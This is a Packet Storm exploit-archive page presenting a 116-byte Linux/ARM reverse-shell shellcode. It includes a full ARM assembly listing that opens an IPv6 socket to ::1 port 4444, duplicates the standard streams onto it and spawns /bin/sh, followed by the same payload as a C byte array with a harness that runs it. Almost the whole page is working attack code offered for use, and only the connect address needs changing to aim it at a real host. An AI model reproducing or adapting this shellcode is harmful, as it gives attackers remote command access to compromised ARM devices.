what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Linux/ARM Reverse Shell TCP/4444 Shellcode

Linux/ARM Reverse Shell TCP/4444 Shellcode
Posted Aug 1, 2018
Authored by Ken Kitahara

116 bytes small Linux/ARM reverse shell ::1:4444/TCP with IPv6 shellcode.

tags | shell, tcp, shellcode
systems | linux
SHA-256 | a4f04eaac3c8f60ac0e0da14f06e43c73f5bc5ae2977ae0ac01a8657d56a69ca

Linux/ARM Reverse Shell TCP/4444 Shellcode

Change Mirror Download
/*
Title: Linux/ARM - IPv6 ::1 4444/TCP Reverse Shellcode (116 Bytes)
Date: 2018-07-25
Tested: armv7l (Raspberry Pi 3 Model B+)
Author: Ken Kitahara

pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.14.34-v7+ #1110 SMP Mon Apr 16 15:18:51 BST 2018 armv7l GNU/Linux
pi@raspberrypi:~ $ lsb_release -a
No LSB modules are available.
Distributor ID: Raspbian
Description: Raspbian GNU/Linux 9.4 (stretch)
Release: 9.4
Codename: stretch
pi@raspberrypi:~ $ cat reverseshell-ipv6.s
.section .text
.global _start

_start:
.ARM
add r3, pc, #1
bx r3

.THUMB
// socket(AF_INET6, SOCK_STREAM, IPPROTO_IP)
mov r0, #10
mov r1, #1
eor r2, r2, r2
mov r7, #100
add r7, r7, #181
svc #1
// save fd
mov r4, r0

// connect(fd, &sockaddr, 28)
adr r1, struct_addr
strb r2, [r1, #1]
str r2, [r1, #4]
str r2, [r1, #8]
str r2, [r1, #12]
str r2, [r1, #16]
strh r2, [r1, #20]
strb r2, [r1, #22]
str r2, [r1, #24]
mov r2, #28
add r7, r7, #2
svc #1

// dup2(sockid, 0)
mov r0, r4
eor r1, r1, r1
mov r7, #63
svc #1

// dup2(sockid, 1)
mov r0, r4
add r1, r1, #1
svc #1

// dup2(sockid, 2)
mov r0, r4
add r1, r1, #1
svc #1

// execve("/bin/sh", 0, 0)
eor r1, r1, r1
eor r2, r2, r2
adr r0, spawn
strb r2, [r0, #7]
mov r7, #11
svc #1

// adjust address
eor r7, r7, r7

spawn:
.ascii "/bin/shA"

struct_addr:
.ascii "\x0a\xff" // sin6_family -> AF_INET6
.ascii "\x11\x5c" // sin6_port -> 4444
.byte 1,1,1,1 // sin6_flowinfo -> NULL
.byte 1,1,1,1 // sin6_addr -> ::1
.byte 1,1,1,1
.byte 1,1,1,1
.byte 1,1,1,1
.byte 1,1,1,1 // sin6_scope_id -> NULL

pi@raspberrypi:~ $

*/

#include<stdio.h>
#include<string.h>

unsigned char sc[] = \
"\x01\x30\x8f\xe2\x13\xff\x2f\xe1"
"\x0a\x20\x01\x21\x52\x40\x64\x27"
"\xb5\x37\x01\xdf\x04\x1c\x10\xa1"
"\x4a\x70\x4a\x60\x8a\x60\xca\x60"
"\x0a\x61\x8a\x82\x8a\x75\x8a\x61"
"\x1c\x22\x02\x37\x01\xdf\x20\x1c"
"\x49\x40\x3f\x27\x01\xdf\x20\x1c"
"\x01\x31\x01\xdf\x20\x1c\x01\x31"
"\x01\xdf\x49\x40\x52\x40\x02\xa0"
"\xc2\x71\x0b\x27\x01\xdf\x7f\x40"
"\x2f\x62\x69\x6e\x2f\x73\x68\x41"
"\x0a\xff\x11\x5c\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01";

void main()
{
printf("Shellcode Length: %d\n", strlen(sc));

int (*ret)() = (int(*)())sc;

ret();
}


Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close